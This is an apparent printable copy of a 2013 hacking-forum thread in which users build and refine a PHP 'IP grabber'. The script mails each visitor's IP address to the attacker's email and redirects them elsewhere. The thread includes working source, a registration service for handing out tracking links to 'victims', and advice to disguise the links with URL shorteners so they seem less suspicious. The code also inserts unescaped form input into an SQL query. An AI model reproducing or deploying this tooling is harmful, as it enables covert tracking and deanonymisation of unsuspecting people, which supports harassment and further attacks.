![]() |
|
IP Grabber - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: PHP (https://sinister.li/Forum-PHP) +--- Thread: IP Grabber (/Thread-IP-Grabber) Pages:
1
2
|
IP Grabber - noize - 03-10-2013 PHP Code: <?php
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
mail("YOUREMAILADDRESS","New dummy","Victim's IP: $ip","From: ipprovider@noizethehacker.com");
?>
<meta http-equiv="refresh" content="0;URL=http://anurlhere.com/" />
Just upload this to your host, change YOUREMAILADDRESS and anurlhere.com, then shorten it with adf.ly and link it to the victim. He will be redirected to anurlhere.com and his IP address will be sent to YOUR EMAIL ADDRESS. The most efficient method for me. CLICK ME - REGISTER HERE FOR A FREE & EASY IP GRABBING SERVICE You can register on this page and get back a URL for your victim so to easily get their IPs. Source code here: ## REGISTRATION PAGE ## PHP Code: <html>
<font color="#00ff00" face="courier new" size="2">
<head>
<title>Noize's IP Grabber</title>
<link rel="stylesheet" type="text/css" href="../style.css" />
<link rel="shortcut icon" type="image/x-icon" href="../images/icons/icon.bmp" />
<script type="text/javascript">
window.onload = function() {
if(document.getElementById('username').value == '') {
document.getElementById('username').focus();
}
};
</script>
</head>
<body bgcolor="black">
#########################################################<br>
<font face="sans-serif" size="4" color="white"><b>Harvest IPs</b></font><br>
#########################################################<br>
<br>
<form method='post' action='grabregister.php' style="position: relative; left: 6px;">
<br>
Email: <input type="text" name="email" id="email" title="Email to send the victim's IP to" /><br>
<font title="URL to redirect the victim to">URL</font>: <input type="text" name="url" id="url" value="http://" title="URL to redirect the victim to" /><br>
<input type="submit" value=" Log in " style="position: relative; top: 3px; left: 80px; margin-bottom: -5px; color: black; background-color: white; font-family: arial; font-size: 13px; cursor: pointer;" /><br>
<input type="hidden" name="submit" />
</form>
#########################################################<br>
<font color="blue">
</font>
</div>
<?php
require_once('../connect.php');
if(isset($_POST['submit'])) {
$username = 1000000000+((rand()));
$email = $_POST['email'];
$password = "pass";
$redurl = $_POST['url'];
$conn = mysql_connect($dbhost,$dbuser,$dbpass)
or die ('Error connecting to mysql');
mysql_select_db($dbname);
$query = "INSERT INTO grabbers (username, email, password, url) VALUES ('$username', '$email', '$password', '$redurl')";
$result = @mysql_query($query);
if (mysql_affected_rows() == 1) {
$userID = mysql_insert_id($conn);
}
echo 'Link to send to your victim: <input type="text" value="http://www.noizethehacker.altervista.org/grabip.php?id=' . $username . '" />';
}
?>
</body>
</font>
</html>
## GRABBER PAGE ## PHP Code: <?php
session_start();
require_once('connect.php');
if (isset($_GET['id'])) {
$id = (int) $_GET['id'];
}
$username = $id;
$password = "pass";
$conn = mysql_connect($dbhost,$dbuser,$dbpass)
or die ('Error connecting to mysql');
mysql_select_db($dbname);
$query = sprintf("SELECT COUNT(id) FROM grabbers WHERE UPPER(username) = UPPER('%s') AND password='%s'",
mysql_real_escape_string($username),
mysql_real_escape_string(($password)));
$result = mysql_query($query);
list($count) = mysql_fetch_row($result);
if($count == 1) {
$_SESSION['authenticated'] = true;
$_SESSION['username'] = $username;
$result = mysql_query("SELECT * from grabbers");
$row = mysql_fetch_array($result);
$email = $row['email'];
$redurl = $row['url'];
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
mail("$email","New dummy","Victim's IP: $ip","From: ipprovider@noizethehacker.com");
}
$_SESSION = array();
if (isset($_COOKIE[session_name()])) {
setcookie(session_name(), '', time()-42000, '/');
header('Location:' . $redurl . '');
}
?>### Open to any suggestion and, please, tell me about any kind of bug. - Special thanks for registration service idea to The Alchemist (read beneath). RE: IP Grabber - The Alchemist - 03-10-2013 Simple enough. Try making this : Ask users to input their email ids and create a uniqueid for them and give them a URL something like this : www.domain.com/ipgrab.php?user=uniqueid Now, whoever the user sends the link to, if the slave clicks on the link, that person's IP address will be mailed to the user's email id that he'd registered. Ofcourse you need to hide the link using a URL shortener. RE: IP Grabber - noize - 03-10-2013 (03-10-2013, 06:08 AM)The Alchemist Wrote: Simple enough. That's a great idea. I wrote down this which should send the IP to the email corresponding to the username (grabip.php?id=username) if is set id=username, or else should show a box to register a username/email. Registers correctly the user but doesn't seem to do right the "if set id=username send ip to email" thing. PHP Code: <html>
<font color="#00ff00" face="courier new" size="2">
<head>
<title>Noize's IP Grabber</title>
<link rel="stylesheet" type="text/css" href="http://www.noizethehacker.altervista.org/style.css" />
<link rel="shortcut icon" type="image/x-icon" href="http://www.noizethehacker.altervista.org/images/icons/icon.bmp" />
<script type="text/javascript">
window.onload = function() {
if(document.getElementById('username').value == '') {
document.getElementById('username').focus();
}
};
</script>
</head>
<body bgcolor="black">
#########################################################<br>
<font face="sans-serif" size="4" color="white"><b>Harvest IPs</b></font><br>
#########################################################<br>
<br>
<form method='post' action='grabip.php' style="position: relative; left: 6px;">
<br>
Username: <input type="text" name="username" id="username" /><br>
Email: <input type="text" name="email" id="email" /><br>
<input type="submit" value=" Log in " style="position: relative; top: 3px; left: 80px; margin-bottom: -5px; color: black; background-color: white; font-family: arial; font-size: 13px; cursor: pointer;" /><br>
<input type="hidden" name="submit" />
</form>
#########################################################<br>
<font color="blue">
</font>
</div>
<?php
require_once ('connect.php');
$password = "pass";
if (isset($_GET['id'])) {
$id = (int) $_GET['id'];
} else {
$id = 0;
}
if ( ($id!= 0) ) {
session_start();
$conn = mysql_connect($dbhost,$dbuser,$dbpass)
or die ('Error connecting to mysql');
mysql_select_db($dbname);
$query = sprintf("SELECT COUNT(id) FROM grabbers WHERE UPPER(username) = UPPER('%s') AND password='%s'",
mysql_real_escape_string($username),
mysql_real_escape_string(($password)));
$result = mysql_query($query);
list($count) = mysql_fetch_row($result);
if($count == 1) {
$_SESSION['authenticated'] = true;
$_SESSION['username'] = $username;
}
$result = mysql_query("SELECT * from grabbers");
$row = mysql_fetch_array($result);
$username = $id;
$_SESSION = array();
if ( ($x == $row['username']) ) {
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
mail("$email","New dummy","Victim\'s IP: $ip","From: ipprovider@noizethehacker.com");
}
header('http://www.facebook.com');
} else {
if(isset($_POST['submit'])) {
session_start();
$username = $_POST['username'];
$email = $_POST['email'];
$conn = mysql_connect($dbhost,$dbuser,$dbpass)
or die ('Error connecting to mysql');
mysql_select_db($dbname);
$query = sprintf("SELECT COUNT(id) FROM grabbers WHERE UPPER(username) = UPPER('%s') AND password='%s'",
mysql_real_escape_string($username),
mysql_real_escape_string(($password)));
$result = mysql_query($query);
list($count) = mysql_fetch_row($result);
if($count == 1) {
$_SESSION['authenticated'] = true;
$_SESSION['username'] = $username;
}
$query = "INSERT INTO grabbers (username, email, password) VALUES ('$username', '$email', '$password')";
$result = @mysql_query($query);
}
}
?>
</body>
</font>
</html>
Any idea? RE: IP Grabber - The Alchemist - 03-10-2013 Why not use two different files? One for registering an email id along with a username in a mysql database table. Another file for getting the username from the URL(through HTTP GET) and emailing the IP address of the slave. And use PDO instead of mysql for data transactions through database. RE: IP Grabber - Linuxephus™ - 03-10-2013 (03-10-2013, 12:25 AM)noize Wrote: If you wanted my IP Address, why did you not merely ask politely? I give it willingly all the time. Shame, shame. urprised:
RE: IP Grabber - noize - 03-10-2013 (03-10-2013, 03:20 PM)Linuxephus Wrote:(03-10-2013, 12:25 AM)noize Wrote: Dude, this don't get me your IP unlelss you put my email address in it and then visit it. (03-10-2013, 02:53 PM)The Alchemist Wrote: Why not use two different files? One for registering an email id along with a username in a mysql database table. Another file for getting the username from the URL(through HTTP GET) and emailing the IP address of the slave. Yeah, I was hoping on putting it all in one file but I'm just gonne divide it. RE: IP Grabber - Linuxephus™ - 03-10-2013 (03-10-2013, 03:31 PM)noize Wrote: Dude, this don't get me your IP unlelss you put my email address in it and then visit it. *Screenshot* I totally disagree. There is always an exception to every rule of thumb so to speak. If you'll be so kind as to click the link, you'll see why I wholeheartedly disagree, "Dude". Not to mention, if you're of a mind to give your Email address out, who am I to say otherwise?:lol: Wait...this does indeed get you my IP Address when given willingly. Thus, on this exception do you find yourself slightly incorrect. On a more serious note, your opening thread would indeed suffice for the intended target. Despite my realistic approach to amuse the both of us. RE: IP Grabber - noize - 03-10-2013 (03-10-2013, 03:45 PM)Linuxephus Wrote:(03-10-2013, 03:31 PM)noize Wrote: Dude, this don't get me your IP unlelss you put my email address in it and then visit it. I'm so sorry but I'm not so good with english and I didn't get the point. (03-10-2013, 02:53 PM)The Alchemist Wrote: Why not use two different files? One for registering an email id along with a username in a mysql database table. Another file for getting the username from the URL(through HTTP GET) and emailing the IP address of the slave. Edited first post with the registration thing. RE: IP Grabber - The Alchemist - 03-11-2013 Thanks for mentioning my name in your thread. Just one more suggestion, in the registration page, you could ask the user to add a URL where the slave could be redirected on clicking the URL. Also, mention it to the user on the registration page that if a URL shortener such as goo.gl or adf.ly is used to hide the URL, it would be less suspicious. RE: IP Grabber - Linuxephus™ - 03-11-2013 (03-10-2013, 10:34 PM)noize Wrote: I'm so sorry but I'm not so good with english and I didn't get the point. You understood my English good enough to formulate a reply. You understood my English good enough to read it with that very reply in mind. You understood my English good enough to even admit to being somewhat confused with my rebuttal. Even though we've spoken on several occasions. I'm the same Linuxephus now as I am and was then. Nothing has changed with that. In summation, in my particularly amused state of mind; what I meant to infer is you have no need of giving certain individuals your Email to obtain their IP Address when it is willingly given. Such as in my willing idiocy in this case.:lol: Meanwhile, please carry on and I shall avail you no further with my own hooliganry.
|